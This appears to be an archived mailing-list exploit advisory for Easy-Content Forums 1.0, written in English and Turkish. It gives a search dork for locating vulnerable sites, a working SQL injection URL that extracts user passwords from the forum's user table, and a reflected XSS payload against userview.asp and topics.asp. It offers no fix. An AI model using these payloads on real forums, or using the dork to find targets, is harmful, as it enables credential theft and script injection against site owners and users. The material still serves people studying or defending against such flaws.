<<< Date Index >>>     <<< Thread Index >>>

Easy-Content Forums 1.0 Multiple [SQL/XSS] Vulnerabilities



ENGLISH

# Title  :   Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities

# Dork   :   "Copyright 2004 easy-content forums"

# Author :   ajann

# Exploit;

SQL INJECT&#304;ON--------------------------------------------------------

###  http://[target]/[path]/userview.asp?startletter=SQL TEXT

###  http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x

Example:

http://[target]/[path]/topics.asp?catid=1 
union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

###  http://[target]/[path]/userview.asp?startletter=xss TEXT

### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT

Example:

http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E

%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X


# ajann,Turkey


TURKISH

# Ba&#351;l&#305;k          :   Easy-Content Forums 1.0 Multiple SQL/XSS 
Vulnerabilities
# Sözcük[Arama]   :   "powered by phpmydirectory"
# Aç&#305;&#287;&#305; Bulan     :   ajann
# Aç&#305;k bulunan dosyalar;

SQL INJECT&#304;ON--------------------------------------------------------

###  http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ

###  http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ 
=>catid=De&#287;i&#351;ken

Örnek:

http://[target]/[path]/topics.asp?catid=1 
union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

###  http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ

### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ

Örnek:

http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E

%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X 
uyar&#305;s&#305; ç&#305;kar&#305;cakt&#305;r.


Aç&#305;klama: 
userview.asp , topics.asp dosyalar&#305;nda bulunan filtreleme eksikli&#287;i 
nedeniyle sql sorgu çal&#305;&#351;t&#305;r&#305;labilmektedir.
userview.asp , topics.asp dosyalar&#305;nda bulunan filtreleme eksikli&#287;i 
nedeniyle xss kodlar&#305; çal&#305;&#351;abilmektedir.

# ajann,Turkiye